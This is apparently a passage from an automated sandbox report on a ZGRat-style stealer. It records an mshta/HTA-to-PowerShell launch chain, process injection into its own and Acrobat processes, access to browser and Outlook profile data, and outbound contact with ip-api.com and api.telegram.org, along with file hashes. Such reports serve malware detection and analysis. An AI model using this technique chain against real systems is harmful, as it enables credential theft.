Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2192 wrote to memory of 4360 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe
PID 2192 wrote to memory of 4360 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe
PID 2192 wrote to memory of 4360 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe
PID 2192 wrote to memory of 4360 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe
PID 2192 wrote to memory of 4360 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe
PID 2192 wrote to memory of 4360 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe
PID 2192 wrote to memory of 4360 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe
PID 2192 wrote to memory of 4360 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe

Processes

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe

"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe"

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 41.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 55.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 29.179.17.96.in-addr.arpa udp

Files

memory/2192-1-0x0000000074910000-0x00000000750C0000-memory.dmp

memory/2192-0-0x0000000000CB0000-0x0000000000DF6000-memory.dmp

memory/2192-2-0x0000000005940000-0x0000000005950000-memory.dmp

memory/2192-3-0x0000000005770000-0x00000000058A6000-memory.dmp

memory/2192-4-0x0000000005A90000-0x0000000005BC6000-memory.dmp

memory/2192-6-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-10-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-14-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-18-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-28-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-38-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-48-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-50-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-52-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-56-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-58-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-54-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-64-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-68-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-66-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-62-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-60-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-46-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-44-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-42-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-40-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-36-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-34-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-32-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-30-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-26-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-24-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-22-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-20-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-16-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-12-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-8-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-5-0x0000000005A90000-0x0000000005BC1000-memory.dmp

memory/2192-937-0x00000000017C0000-0x00000000017C1000-memory.dmp

memory/2192-939-0x0000000005C00000-0x0000000005C4C000-memory.dmp

memory/2192-938-0x0000000005CD0000-0x0000000005D9E000-memory.dmp

memory/2192-940-0x0000000006600000-0x0000000006BA4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\File1crypt.exe.log

MD5 4a911455784f74e368a4c2c7876d76f4
SHA1 a1700a0849ffb4f26671eb76da2489946b821c34
SHA256 264098e15b5b33d425f3b76e45b7976b58f917048125041135f7e60d8151108c
SHA512 4617591400409e1930195795a55e20d5f063042bb3e9fd1955099066e507b6ac8a1e3ae54cc42418e2639149b31bf7e58cd5743670d9030a15e29f14d813815d

memory/4360-946-0x0000000000400000-0x0000000000578000-memory.dmp

memory/4360-948-0x00000000058B0000-0x0000000005916000-memory.dmp

memory/4360-947-0x00000000057A0000-0x0000000005832000-memory.dmp

memory/4360-945-0x0000000074910000-0x00000000750C0000-memory.dmp

memory/4360-949-0x0000000006530000-0x000000000653A000-memory.dmp

memory/2192-944-0x0000000074910000-0x00000000750C0000-memory.dmp

memory/4360-950-0x0000000007760000-0x00000000077B0000-memory.dmp

memory/4360-990-0x0000000074910000-0x00000000750C0000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231215-en

Max time kernel

148s

Max time network

149s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Files.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

ZGRat

rat zgrat

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2236 set thread context of 2348 N/A C:\Users\Admin\AppData\Roaming\File1crypt.exe C:\Users\Admin\AppData\Roaming\File1crypt.exe
PID 3396 set thread context of 2112 N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe C:\Users\Admin\AppData\Roaming\File2crypt.exe

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A

Modifies Internet Explorer settings

adware spyware

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000_Classes\Local Settings C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\File1crypt.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\File1crypt.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1176 wrote to memory of 4468 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1176 wrote to memory of 4468 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1176 wrote to memory of 4468 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4468 wrote to memory of 1316 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
PID 4468 wrote to memory of 1316 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
PID 4468 wrote to memory of 1316 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
PID 4468 wrote to memory of 2236 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\File1crypt.exe
PID 4468 wrote to memory of 2236 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\File1crypt.exe
PID 4468 wrote to memory of 2236 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\File1crypt.exe
PID 4468 wrote to memory of 3396 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\File2crypt.exe
PID 4468 wrote to memory of 3396 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\File2crypt.exe
PID 4468 wrote to memory of 3396 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\File2crypt.exe
PID 1316 wrote to memory of 1400 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1316 wrote to memory of 1400 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1316 wrote to memory of 1400 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
